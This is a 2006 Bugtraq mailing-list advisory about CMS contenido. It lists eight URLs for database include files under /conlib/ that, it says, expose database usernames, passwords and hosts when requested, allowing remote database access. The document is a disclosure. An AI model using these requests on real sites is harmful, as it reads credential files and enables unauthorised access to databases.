CMS contenido Path Disclosure

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: CMS contenido Path Disclosure
From: CvIr.System@xxxxxxxxx
Date: 13 Oct 2006 14:43:54 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                      CMS contenido Path Disclosure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          Affected Software .: CMS contenido
                          download..: 
http://www.contenido.org/opensourcecms/en/index-a-104.html                     
                          Risk ..............: high                             
 
                          Found by ..........: CvIr.System                      
                            
                          Contact ...........: CvIr.System[at]gmail.com         
                          
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Affected File:                                                             
   
/conlib/*.inc

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Explicasion:             
                                                         
http://[target]/conlib/db_msql.inc
http://[target]/conlib/db_mssql.inc
http://[target]/conlib/db_mysqli.inc
http://[target]/conlib/db_oci8.inc
http://[target]/conlib/db_odbc.inc
http://[target]/conlib/db_oracle.inc
http://[target]/conlib/db_pgsql.inc
http://[target]/conlib/db_sybase.inc


You can see data of the Web like User of db, password, Database, host and thus 
connect yourselves remotely to the DB
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Special 
GreetingS:_ANtrAX_|Azrael|her0|Matasanos|Ednux|4ur3v0ir|FR34K|Hanowars|Bacan|xarnuz|Slappter|mnox|Txis|The
 Shredder|FaLeNcE|Darkness-Mx|Zickox| www.c-group.org

Prev by Date: Morcego CMS <= 0.9.6 Remote File Inclue Vulnerability
Next by Date: SpamBlockerMODv <= 1.0.2 Remote File Include Vulnerability
Previous by thread: Re: Morcego CMS <= 0.9.6 Remote File Inclue Vulnerability
Next by thread: SpamBlockerMODv <= 1.0.2 Remote File Include Vulnerability
Index(es):
- Date
- Thread